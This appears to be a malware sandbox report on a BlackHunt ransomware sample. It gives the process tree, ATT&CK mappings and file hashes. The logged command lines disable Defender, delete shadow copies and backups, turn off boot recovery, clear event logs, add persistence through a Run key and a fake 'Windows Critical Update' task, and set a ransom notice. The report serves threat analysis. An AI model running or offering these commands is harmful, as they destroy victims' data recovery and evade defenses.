C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:3680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3616
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:4444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3680
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:7320
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3864
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6748
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:3056
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4712
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:7024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1576
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7744
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3508
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:3648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:4836
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:4232
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:4752
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:3140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F2⤵PID:644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:1504
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:4468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2720
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2348
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:3500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:3012
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2100
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:1364
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4260
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2256
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:228
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3508
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1080
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5064
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4640
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3048
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4140
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4468
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4448
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:16264
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
PID:8232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:15156
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
PID:8680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:6908
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5464
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:6952
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"2⤵PID:6016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:7160
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:12964
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 12964 -s 14644⤵
- Program crash
PID:11872
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:880
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:5944
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:5592
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:14024
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:14476
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:10168
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:8660
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8816
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5324
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:412
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:16312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:8132
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:14384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:8608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:9124
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:7760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:7712
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f1⤵
- Adds Run key to start application
PID:1148
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:4820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2020
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2200
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2852
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:4444
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2000
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:8188
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:7356
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:7344
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F1⤵
- Creates scheduled task(s)
PID:2880
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:1560
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:1736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:5068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:1724
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:2008
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:10808
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:2380
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵
- Modifies registry class
PID:1180
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:6620
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:3812
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:3076
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:1300
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:11340
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:1780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:5076
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:2740
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f1⤵PID:2176
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:2320
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System1⤵
- Clears Windows event logs
PID:7684
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:5068
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F1⤵PID:7212
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:6776
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f1⤵PID:6716
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:6788
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f1⤵PID:5848
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:5856
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:6832
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f1⤵
- Kills process with taskkill
PID:7064
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:6428
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:3484
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:8348
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:5812
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
PID:7552
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
PID:8012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 12964 -ip 129641⤵PID:7148
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵PID:8716
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:14456
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵PID:13760
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
- Enumerates connected drives
PID:1560
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5c380223f44d3d34e3c2d5cff5d3b418c
SHA18b3688e2f0bc729253833dedb059e42c489b40a3
SHA256a87090135a29ff5c1fbcea83076d080b1af01eb21758722b2a40e4b71fbbeba9
SHA5122c263f098aaa64a3f4748107509c698d306fb9269f7e48410eebe00efa573acded63626265a888aadba7cbd43a3ecc03f3d02f6ad510dbe606748f6109f8fa10
-
Filesize
12KB
MD5d95ecd9ad362489023fa8380374b5173
SHA19e1b64c9c603b77ec0227f109fd4d73deba6546d
SHA25623aa4598ab72998910e4626cbe079f63818451d18ab645cef5902bde1c5e034e
SHA5120da14b4650e0c7d5aa3a46d6ec9c5197871f23a867ad2fd31310616429bc0774cf6edcff8f44305be14672d159d4a2220c2d3e22be8a2d420034a1221889d2d0
-
Filesize
684B
MD5653fa97ad94ebd9f03d4775e2018fd74
SHA1ed73acbaed925e43105921f230f9871635bde77f
SHA256b35ae834e74b1fe050864d470c085649e8039fb6443edd1f388a498ed24e5cc9
SHA51299086c8dfa5dadbfa9f6851a5a3146966db188517a8faf277b6454b9e0c1d323273139af69632ba6fdc31331c1b183f7733311a3595121107e0a1b0df618d864